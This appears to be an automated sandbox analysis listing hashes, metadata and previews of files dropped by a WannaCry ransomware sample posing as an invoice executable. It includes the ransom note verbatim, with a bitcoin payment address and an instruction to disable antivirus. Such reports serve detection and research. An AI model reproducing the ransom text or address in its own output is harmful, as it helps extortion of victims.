                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.819830313222283
                                                          Encrypted:false
                                                          SSDEEP:24:hXrzChXy1JEa87SM3c3/MYTKXU5ND76NS3l9V+otGTA:ZzkyzEa8NA/MYT4UTDumlyNA
                                                          MD5:4C5F0273FCF4974C14CAA192D7A67DAB
                                                          SHA1:4DF71BE2A19322B1C89F83F96E99164BCC66B1F6
                                                          SHA-256:235DDAB663344AA6AB024E9BADB1F5C23FB1562CE68AFF0040BE8A59813AEE4A
                                                          SHA-512:3A74E06CB4CA1EA8FE08ECDCCB4FF64983993FD8C41288E15A73CC04136E74224443FC113035A6F6F73FAB1FA7C1B225CF40B2800495FB9A35E7F108A9230F62
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.848097317455926
                                                          Encrypted:false
                                                          SSDEEP:24:bkj6jNSLt0LiXDGZ8Murmxrk81P64fR9B2I9nmHR6qkfrHkAItYX:bkGjNSL1yyMkwb5TnA69kAItYX
                                                          MD5:3F6BE896E850808CFB2A9E4C6B96C14E
                                                          SHA1:301842A6EBC6A1185EA68F8F5F74CC29E688CB42
                                                          SHA-256:3FC13832B2220E7A884EBF777DF0104B719A4F79602DC7B52E68D73ED3140979
                                                          SHA-512:DD117E3C6FDA766F50F155BD7A5C1FEDEA3B38872E8FB84AE068F58B524C539982B967339572689BE9987F9584C98B2FC0D5E9DDE62D76579C928E589513BD92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.80993583322359
                                                          Encrypted:false
                                                          SSDEEP:24:L++YW151wAaAbUd1XAXJmaKTDljSjzVo1H9vUgwTJcvuUGTdL:L+glwBaCsJcljRdBwTivuUGB
                                                          MD5:3D4CD4E842FC9F0B9C985F9DD1701FE4
                                                          SHA1:0631435AA989C2CA129261458CEB739098A1B4C0
                                                          SHA-256:ED8BF86F6F545E1DC0DBAA3D34C23395AAB8F02A83221FFAE0B5AD8D06D8AA40
                                                          SHA-512:60DB3B619EC5560F37F74EECCAFC54EE0E6A1B2BD0729409E5C375A5A7B53EF1A258BA1D59BE471133FEA40A9D11A079F612520173FD9B9F42DE06A47C84D59B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.841698618407332
                                                          Encrypted:false
                                                          SSDEEP:24:bkig5Y39eRAUNZxVL2lTb0cJvXTN4jnWI2cuyKlXiBhKokD+Nds8VmHjHXSVgc9r:bkiga3mnxVLUb0cJPB4jV2cutijXNds4
                                                          MD5:71AE585CEDC6BD4947CABE4E039E0F53
                                                          SHA1:4F164E5FAF761076070E409712D8D83DB1F34284
                                                          SHA-256:30AF169B1434E9513FF7FC285C17D8A9DAC5E6AD5AD3E4234527D51BF177FC8E
                                                          SHA-512:0004A3137F4F39C0DD66EC3624F5751DBF285C10BFD91BC74D187AF8020E66D1947586F903A44AEBE423A82DE03056C5E904F00D1608BD265C28B00780B5D1CF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.800194796026652
                                                          Encrypted:false
                                                          SSDEEP:24:htgX1RXNeSakqjsdappBUR+5C/4nU8esUGkgVLYH:htgX1RXNeSakqBv5JU8lJkgVLYH
                                                          MD5:1129E048FC35FFE9B7B870571728DC81
                                                          SHA1:0373BABB82E142474693B06AD6905C51A10DE886
                                                          SHA-256:2E67065A23B2FC2714D8068559AC9B7534D4F3AA241EF1E00FCDE859D4951BEB
                                                          SHA-512:F73846F0019B360743070439C196B86438121581777E36EBA44033CCC63B12C1E7B13367E56AE26E2323F66540797AB6285E7F609E094326CDCB50831B51D4C3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834608565146905
                                                          Encrypted:false
                                                          SSDEEP:24:bkWVJCJA/4uBTKnONRbHt9NY5VV/7EnPVqz8BcCWfbIilflwJDondB3jOl:bkWVYK5mKjvNYJEnPVaY8VflwJMel
                                                          MD5:095A788ABE8F4DC8981D2B712FE6FC8E
                                                          SHA1:141C8DDBAD7F7FB45C63C3167D8E122BB1232439
                                                          SHA-256:5D109E1632BBA4B9984916E24DA7355C8136D5077FE605E0F6C096F53BDA6767
                                                          SHA-512:C5F5A60DF348A33F5CB92A9ADEF78C8F0D4A5BFC1BCC1D1513EBAF6CBAF6AE6C01A19A5FF520C41AAC03B798418EEEC89C4194D24208E4E2F850CE186617A627
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.818747812713695
                                                          Encrypted:false
                                                          SSDEEP:24:kE1qtfuYLsiyw6xccbFGf+EXMd4jMyMmyDR+ynG:ahLnIcM9EcywyMm2+yG
                                                          MD5:87A3289919D902E00991C3BBDC02D52E
                                                          SHA1:89AA89FD74E33D7CD16930BA8AF7DEAD6C442BCB
                                                          SHA-256:FACCBD7C756879525B9748926A7249DC2AC0B36C8E07E26980038DD43C74B36F
                                                          SHA-512:87639FC69461EDEA45E7DA8D4D43CDC05BC9CCBF996AC5BF6116F348D9259214EB245BA379B7E0F558B17FB4A80EE2A788D8C19ACAFFDC4B4182B35095D64AAB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.842046283415181
                                                          Encrypted:false
                                                          SSDEEP:24:bkC1Z0zVCssCIjGvYIoJa0iSBygBOWsdtGdJ56IkBrD3sUhvcRW4b+tG4l3:bkXiCIjGgA0Jy3tGdeB3sUCW46tGo3
                                                          MD5:FD4D939DB76F66B57FE2703E4460B1AB
                                                          SHA1:7D46239EB6A7B485BB195893CD89F3FF1777CAF2
                                                          SHA-256:6F9172B6C6616032FFF0D23DEE7102AF71D5B011C9AC1B46157D41C9A8C09E65
                                                          SHA-512:A7843A64E248ADE089FCD9E68B6376EAD7B93CFF2F66AFF4DFA84BFF10D419CD365958D851D82D019B8D18F2DB43A738A629B486E822E47094A3827FC658425C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.805978454846127
                                                          Encrypted:false
                                                          SSDEEP:24:a7cO8nBhz6c+Oi8A6NNJWm6ls+ARqn/nlCPavz8nPFL6P8j/Qi:TBh71Ak38IRqvPz2PFuPGJ
                                                          MD5:E7112335E77422948BCC9368881622B6
                                                          SHA1:655BA1F63612E543FD27208F4BD7C638659C24B4
                                                          SHA-256:72FAF407EEA25E5097ACEB8904973F152F89DDE6438BAF7D9FD3E57C0B9E3BDC
                                                          SHA-512:7A937060DEF53F3E397BB0337DC53BE2A201BAA0190D618B84D27EF927BD484444C17A021387013558443C65C90A77B2D6A14274E60E61C60CA5BBA2003272E7
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.846861919674208
                                                          Encrypted:false
                                                          SSDEEP:24:bkJpUsOHYH31RdWZNpWrT8WALmjMjC4GP8HQBR5EUmv:bkEsO4FRdWZNpWrULmeG/qUe
                                                          MD5:B9D31689BC12BCAFBBA562FF411659E9
                                                          SHA1:AAB5DA4CA5FD996907E36369843A54E4B7EDF8BE
                                                          SHA-256:4370689033F1AF394384F754715529E39285963D03110BE5058062B6965E014A
                                                          SHA-512:F97D91AF93AE9425F386B86F85D37411142C46306681A561098F825684482F8F3E15E05A4F8C4A16652FB1D5A65FBE346CD81F91BDB7817DF41AB2EF3C5B7D47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.821409540539878
                                                          Encrypted:false
                                                          SSDEEP:24:TbyNh4ZVuFHONr1NjnhGBIKRolzqWSNk8QHTiIefsuBaDaq:PyNh4ZY1OP5hcoNBQXVIek/aq
                                                          MD5:C8B64E139DE03A2F68E7CBEF327279C4
                                                          SHA1:BFAD5B95802DB42536666DBA76147C1D612B1411
                                                          SHA-256:4935244D1EECC22D38DB289DCF7178A4E1A742BE06670D04965A1B86A7F3EC15
                                                          SHA-512:5B9E8253FA7C976A03370B332243D150B8B94AEA9A261FAC0482420BFE20E7BFF2E16A2DC66587F9F417FD1681F2E881CEF962A1AAA5DB6C3D2C63DF39AFE631
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.852375902198529
                                                          Encrypted:false
                                                          SSDEEP:24:bk5NKlFd0vrQkiOvC8LGgtYUaGOa8V3srkXI7hsonZ/+9FlqUDLLbMEhv1hKV:bk5cH+v8k9ygmnG03sp7hsKx+9qUfLbW
                                                          MD5:68C6587A8FA5E6D697D561921B6CEF6F
                                                          SHA1:50F5F76F361F7BB68E9B843207FFB19C329600B6
                                                          SHA-256:9C3BB555124EA40D4A34E0B450CD1959272500E83C2A0A206C7200707560AC63
                                                          SHA-512:C2AE1815E2EC0F3FCCFD0FCC637459B4289CB77C10E02F5D22C6756E7FE1517A88153C520607DCFFAF5BD82537D8E9AE904C13748A133307F5E99A53A3A5AC1D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.776661021195404
                                                          Encrypted:false
                                                          SSDEEP:12:c72fWcMToiC0xbi3dOGm6UD+LEUg0Ctjz0GDj1PVe4ZzuwQOFOkNNTgkKW19vf3u:c7cWvNbmd4zV0MNjpY4zRfKqxUbr
                                                          MD5:DA7C2B06B8685341CB3AD4320603CABC
                                                          SHA1:ABFDCF496DC7304D68B005080555AF234CB04EAA
                                                          SHA-256:3A997457FADB69887B8AE9C8F4D21CDD8CBD61EB4CB6D6F6C5E862CEEE195EE4
                                                          SHA-512:7498FC9D1B7B34C54E78E59B0B78172183E769B03E40587676D34CBC29A6C322CB0F3D830393B1C5022D6004798D7B9DED0DEEA9CDD0E349AFC04B46E7509B07
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.829376610701004
                                                          Encrypted:false
                                                          SSDEEP:24:bkHp0Gg1N0UCgtRN2FaZycyf4sjak2+qq6bpt6FoRsQBAUmhMS17O:bkMeotWFyiaqi6FHUhdS1K
                                                          MD5:8F38CF9E85492DBFC44DE06ABF5202AA
                                                          SHA1:FC54FBE6778BE07B41BDBC4D51A18CA2FCA61123
                                                          SHA-256:4949E0378F261B8CDE67386841342A5A7F42DC76BD38594B64FFEC67A1C3762B
                                                          SHA-512:1585EE9D7B55599CDCB2E3B11ADA61C74F96EEBB5D7A234AFC463E0672611037B77C897FCC46CE6B916F3BB9C8EB6DCF7D232DAE6DB91890E539E1E376257950
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.804696797628274
                                                          Encrypted:false
                                                          SSDEEP:24:a0YYmCyOPbpclRtwpONVYmc9HMJfzqytSuMKOQB6CRl/yDXKTUGdk:OYV3PbClRtCiVcBMRzqykuMKOUR5yqUJ
                                                          MD5:DE6900311FB992C4DEE5502D3AAB75D1
                                                          SHA1:281EA8D8703692EF9683DD4635C2EB3062BBD2B7
                                                          SHA-256:D4F11203FC611B85A2118329F82E27C290A9B6348AC32D42845F195EA339BF42
                                                          SHA-512:3C661B75F6659124B8C5E6E9EFDFB1DA8DABD89B5D5E43C27CC7B9B47C1194AAC57790A7A17A77012548D0F701C8DD7696AE94D7D00FF30B5DB7090BE403D05F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.840539320181757
                                                          Encrypted:false
                                                          SSDEEP:24:bkmZmsAqs5ryMgGa/k24/yUEOiDdJuWxRb4RRJeRnsieVuFTYV4lGw2bPnki+LQ:bk6msA3ryrcz/kPuv/Ssimuc4lGqtLQ
                                                          MD5:CAB1F292EDCC1474986D8DA5DBAE4FA1
                                                          SHA1:1E9D7DEF5EE19359BD6E9E75ACA470230055C571
                                                          SHA-256:B2864012B91D4A81C1C72A1B391195A4DCCF034B7403EB752B1AE4460318AD8D
                                                          SHA-512:46980A02D2CD5591CC2F3B7F1E63D5FA225C44F9DA88B4C0F5D434339F35AA185F3785BFAB3D5A640A011EA5EBDFD039D85B000BFEBD53773189C4ECB5501016
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....&&.b.......4}...,}...R.W...P...Y.P=O..`.N.]..........f.yF.uOr.... ..^ ....QX...aKOD^/..=t..4....dM:..0.?.M.{....{.#?.D..4o..a..}....c....}..C.@....p.z..%...$,...cJU..BJU2...y.>n|;KA.}.....L.A1*.7..T..)........H...LbV...`......T.8..w.W;RGE.,............w.+..[o.(..7*i....n..nK........^......J....-...N.^"..._.X:}....j).=.F"N.x4\.."../p qP.i.k...z.q..y...iO..~?..aA....Z.t...U.mc.K.......5...k..$....]C..s......5.K...<.n-C...g.5..j.........7FI..D.C&...5..EL6.....C......oK..I.R...1F.....;...&U.-...D..>,..X...0|...O........lG..)...&eI.k(....B.j...1..!....m..rgc...B..X...... ...n\G.tv...YO.pucF..J...Y......G......v.B..u.nB..?.......D..'../.N......z.|.Q..F.......;O..y.J.Kw...r<?0*.q...V..Q...:`..P..)...O.!....j.%$:x..@)......l9K.C.^gF.8).YC.-..^(C.KcE.;.@....Wn....+......).......n-.:.w........x.&.M.E.`....X~q.6_...z.^..4.)\....+i[y.vA.....eF..)L.9.....p<}]=Zu..J.)......8b...vw..~;.P...4K........+...a.Q..!'h..W...g=5>C....7...U.:g.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812830001482073
                                                          Encrypted:false
                                                          SSDEEP:24:lzNCEvn3naaqtZBX1C9yle4DBxE3UEjXJ0SghZW:lzNC6n3antZBG8DBxqUYSSMW
                                                          MD5:AA341E3728B2E710AD7F37ACEADC70FB
                                                          SHA1:A4A784F2BCD68568121547A3619E572DD57836BB
                                                          SHA-256:6F80D5CD465495967E3F3D3E8E5A02BE837550902CD214E79F6367DCE0C4895D
                                                          SHA-512:D8A5CBE26ACBF6A74AA54629AE4A037ADEAC279DAC5EB1D308E3E977B7B85638D107AE9774A37836F2EDA1F8FA2F0B67C18A635EF2058031EBA61B8FD19D19BA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.85303185257776
                                                          Encrypted:false
                                                          SSDEEP:24:bkvgEfeB6AK/WpHew64F8tT18B2C0AaMXNgJEj/ZvqLavf4x+aJ:bkIEfehK/ltRW2lAV9pVvKhhJ
                                                          MD5:3A2A49DC26F18E1ABA8B756E9AE39687
                                                          SHA1:109D99C255A59D7C01336D2AEFEAA26CF61A9B78
                                                          SHA-256:5CDC93639D7BA39D69603B2BAD0A8947B2652B4DB1E195302E9EFB47A720DFC7
                                                          SHA-512:1A69EA758123E7BDB6C0DC86E4893168BE54FD9E376E5902C4B42F928C1117A829962733D3D39B1E4C72D82B13226F6E2197AA0801D0DF8570F80CDA4063B6EC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....h.....q..M..,..\..c...o.&......;..;ZY.....D...N.U..>....S..]....<;%.. ..e.6....l..<QOS.<..L...QQ..Z.C..O..nmJ~.....&j%..E..._...d..4.q....p" r..?.>..........%.Vy.L..c.?;.7..69......@.8a=....E..7.H.&V.X...cY.~.....z..i1>...~........)3lX..9"............5.......&5.@.(.!.#JH.RT~..C.l.. ....,.`9...z.~_..R..9e..M.$P ..kd,s.....R.f........'..*._.-{Q.....N..4...8.uc6.<..%.l.)+JQ..5..87..-t......v.&wwk<.....X,|.;_.n:..H..L.J....d5^..1.......^.<t.r..s.h.6..xA'.G.v..YN...<...^....D).g.. .#$|Xu]oJ~........Uo. .|.>...4.S;............f`.......`.p....@pO...~.4:LX@x/..\....m..@.+.].g.L...".]..3o=..Y....$.}{~..#..5.Y"...PI(.*...s..lI...P.....f......9..pg%..>z... .V{.7..,..'..o.;......".X.aw..y.........7}.'.<../...)t........-...p......jH......h.X.`RRyw.hC.....?j..S...PO.26.....hK.!*,>s..a.JB.nN...kGLU..j~.'.........LB.<qF.....$o...{.. E.....B.sD T...h.#...`..(...Q*....{;...~.50........%<....V..../.h.....c..O.,..l.dn>OO[....j.3.I. .H.`!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.819869068167296
                                                          Encrypted:false
                                                          SSDEEP:24:cTdUc4cSRMZYqg2L286JXSTwrzsD3wttRNHlXVkNd:cTdU/b2L286jMktPNHlXVkj
                                                          MD5:8E79C756E83271D1035B5B44D69DBC15
                                                          SHA1:F92BE20EFC2DB0D62F83C8AB9A96B285B5EC5A59
                                                          SHA-256:D9CFC761CC944FC19F5DB50B12A968338A07EA0F1248AA2C0DEFCAFBA82EA6FF
                                                          SHA-512:26C3E3E7F7285EA61DDF51D5BFBB7D36098980CD9FB7CA91BBF60AC1B580A3B914E7E7B9A739D9AD4B3C2E80B654DA48DD23E4FE22F0C2D38D4281D40BDAC5A8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8269715905666555
                                                          Encrypted:false
                                                          SSDEEP:24:bkV7x940oTRSRDfYV5/3YAo2j58jcpn30WUFn7pxhw3XbBtLg35YArWzRGybkN:bkV7xu0MUfYzoTDjMnEVhCX3Lg9rWzRM
                                                          MD5:4B5C5F5B01DAFE916625F7D6317618CB
                                                          SHA1:A6D8F7CF1A4C120D6B0230A2ECB859FED2C57641
                                                          SHA-256:6FEC65CD4B21C086CDF4C6D275A35A0DCAC667E889CD405516AE8C3950AA75DE
                                                          SHA-512:E37696D8C644BC5642FE5D4FDA5DAD9E58CDE97456B39FCA09A81B70CB3C03C6C7D16F432565DDBC14EA1D13CAC0F2DA2D0635A7A3221A7166970318F7D1B88F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......H...L.....@uf?-.N..7......,.e..|F&....U{..g..,5..pPl[.m.D..L.(>9=&L,.R4..IA..$.u.7..,|0..N..e..2...j......9.y(9;'....Y/+:....s@x.. .;..t....".cja...,s..2.X..UEi........',.Z9[..H;......|u.V.0.....gF.^..^.Ra....{z%:E...U....B..q....v.....-..3..............e..O./...>O.%..wx#%..B3.e..T..DJ..,.a...w.....b.x.....|...HNk..C.H.D.s...$A..u.i._.U.. ..15#bcM...>"..........y....N}.............`...;W.C..Y?..s.'.5DG..kS.....f=[.......N,z...N.....(.>.F!...................y.h)...~.#w.8.R..U.L.....b...".<n."..g.j..}0..UN&v...a]........1...`......?..n=5.2.x..J1./...AS9.._.U!L.R..p..r..b...o....,f..P.n@g.\T.V.8......x/..c`..2.=.p..........1...Bj..'"v.Ke..,....G\.h.....h.g.9>3'........{q......i..U.......q......r......3A.....(.8....O.._.A.R...A..[....P...n'.....r.....g.K.f'..0#..'H..'.c.....U".s...W.Y.9..y.....&.....usD.?@.,.|4......^......K....1...k..1..N.`@.!_..(.d..D..SA.bd. <....hy.8l..W,.....oo.|..%9.......i..r.Q.v.,...8a.5.[X.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.79742894563415
                                                          Encrypted:false
                                                          SSDEEP:24:D7/raSfcNXaW7KKC+7XLzxMcGTRDgvtdpNuE0gyP:D7jR+XanKbzx8RDgFvT/c
                                                          MD5:E9975251F6A35CFA326D586A3ABC8723
                                                          SHA1:4FD84337EE6B15DD48F6B8ECEDB4F3E906BA6DC8
                                                          SHA-256:8B4DEB46C659E5DD2485A2A2A65810FB72FDB303677AD9980D560609700BF274
                                                          SHA-512:470162D1E875F45F99A1A0BABEA28B6211ED47488C54693E6E7D5A8A4B0A092ECC66159ADAD731037A00B1BDC00F453E481DA735601CCC5F18CC2C7D7E30936B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.848816869635776
                                                          Encrypted:false
                                                          SSDEEP:24:bkzbtRCOiGgvHLBOu1pwKrbqr4jcnTb5woy85F9xzLIchsOhaEPe:bkzJhgNRbqr4jcnTbNXJSO1Pe
                                                          MD5:C5A72C6A751E24673AF066BD8DCF7E9C
                                                          SHA1:02098449E177B901C1B1A87C6C82A19F23E01583
                                                          SHA-256:BE9B8B753362B3A5DB5EA4C078C1EA9F3FFD313A30B5793C7ADAD751B5208D84
                                                          SHA-512:2BC175AAFD46B26AB5A0E62BC947BDB7CD0FAD93601D82157709DE41272EFB61A01FD2ED831C5EA6C1E4EDAA00C5555E7BD3E5619B771C7FEA1016EEEA3A8CE0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....X4 K8.;.X b........A=..@..O.wN.R..E..W...z..6}.u*. ..9?.... ..._..m.C...rK.w.:.......Q..&n......7Y.$S.l..C.............U.80..M...Qm....C.u.U.Y...<....t..Vj.s.h...h9.9J...n.@G.....6.vs`..n..4..5a..7.=.1BR..4..}..er..M.*h.;.......q.'B<GFOwv.K....&.............yN-...}.?...J..)*.c.../.L..N.=T4l6r..H..N....................U...9.v...w_. Z..m@........U........|.y/....~ai..9G4q..T=.8.....uH.P....c........o(..Ph9I..U*...F6.=+.|...$.y7.........F. ....}.1DUl.V@H/....X..D.k\....#..X.Q........;...\...L...X@.Q.}3jA...H......<...LZ.DB.P.Nq....]..d?.s.._.s...v...3..B......`E.....w..y(.E..P.\o.x..:.........@.Sj.v..s..j...5.h....f@o...P(/..pR(K...p.(W..n....Qi..Sz...)....0.E{.'.........2.;@.>t...Hej..|..Vd.....v...BH.....5!.q..L-..v.../..U....e..rJ|.4.5..{..)h...U..'$.N.6..k..x.)s=g&..d.(.Nh...|%...P....2.k\d...ll^....]!.tN.9.V....|....,.7....@...S....gp..4.E...yF];...r(....:..|O.^yFI`Eb.....l}.._.r3..e.4jU.{.Bx.......a=...(7z}Br.t...A.W8..z.O.I....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.828129222117002
                                                          Encrypted:false
                                                          SSDEEP:24:PaTqBUY+nmh4MALM0MWLRodNqNWM4ywdNU4yyzRVvUbapkqN:SgFh4MAVp+ncWMxcNfysXN
                                                          MD5:054E23C1349999421768276E230B1AA1
                                                          SHA1:A21C992FA3B04B6A3F864B1FCB10B875D2C216F6
                                                          SHA-256:0FCC4BC9102175D067051D2F2A8837FB29F3BF4D79C828D46D9BA1D067C83756
                                                          SHA-512:4E602E6A37CF40DB2B5D1FE408B6FA46020E528B8088388F8ECC540C35614426C8715A14D5060AAD8868945409BD25EB7F29EC93470DC99155EC22C437C229BB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844868078231559
